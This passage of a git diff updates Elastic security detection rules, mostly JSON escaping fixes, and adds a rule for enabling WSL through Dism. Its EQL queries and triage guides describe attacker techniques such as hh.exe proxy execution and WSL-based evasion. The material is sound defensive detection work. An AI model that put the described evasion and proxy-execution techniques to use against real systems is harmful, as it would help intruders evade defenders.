"framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json index fbd06122d02..688b1c73dc0 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json index 7b3baeb0013..3fd373f9b56 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json index 6280f3b737b..98e6e17f9f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json index c0ad74f9373..e6cca08dd42 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json index 1a9f9ae9362..f6c2ced1dd3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json index 8c77da6864d..56a268e8216 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json index 456b2e40940..c53c1497426 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_5.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_5.json new file mode 100644 index 00000000000..cb364ed4fb9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_5.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to enable the Windows Subsystem for Linux using Microsoft Dism utility. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Enabled via Dism Utility", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Enabled via Dism Utility\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies attempts to enable WSL using the Dism utility. It monitors for the execution of Dism and checks if the command line contains the string \"Microsoft-Windows-Subsystem-Linux\". \n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and WSL is homologated and approved in the environment.\n\n### Related Rules\n\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Windows Subsystem for Linux Distribution Installed - a1699af0-8e1e-4ed0-8ec1-89783538a061\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n (process.name : \"Dism.exe\" or process.pe.original_file_name == \"DISM.EXE\") and \n process.command_line : \"*Microsoft-Windows-Subsystem-Linux*\"\n", + "references": [ + "https://blog.f-secure.com/hunting-for-windows-subsystem-for-linux/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2e0537d-7d8f-4910-a11d-559bcf61295a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "e2e0537d-7d8f-4910-a11d-559bcf61295a_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json index 0dfefa078a0..9f53039c61e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json index 9eb75a990e9..4f58b85ecd9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json index b9e3e1c338f..6097c2b3ac6 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json index 6de200bf88a..3d202b1417a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json index 1e71286e093..cbf9cae921c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json index cb437cc4180..c85ad2dfaef 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json index 91873e82a18..982851e6936 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json index 5a6a538c4a6..683cbe4b046 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json index fc379beebdc..461841a6128 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_104.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json index 3977022a445..bebdf83b68d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_105.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account 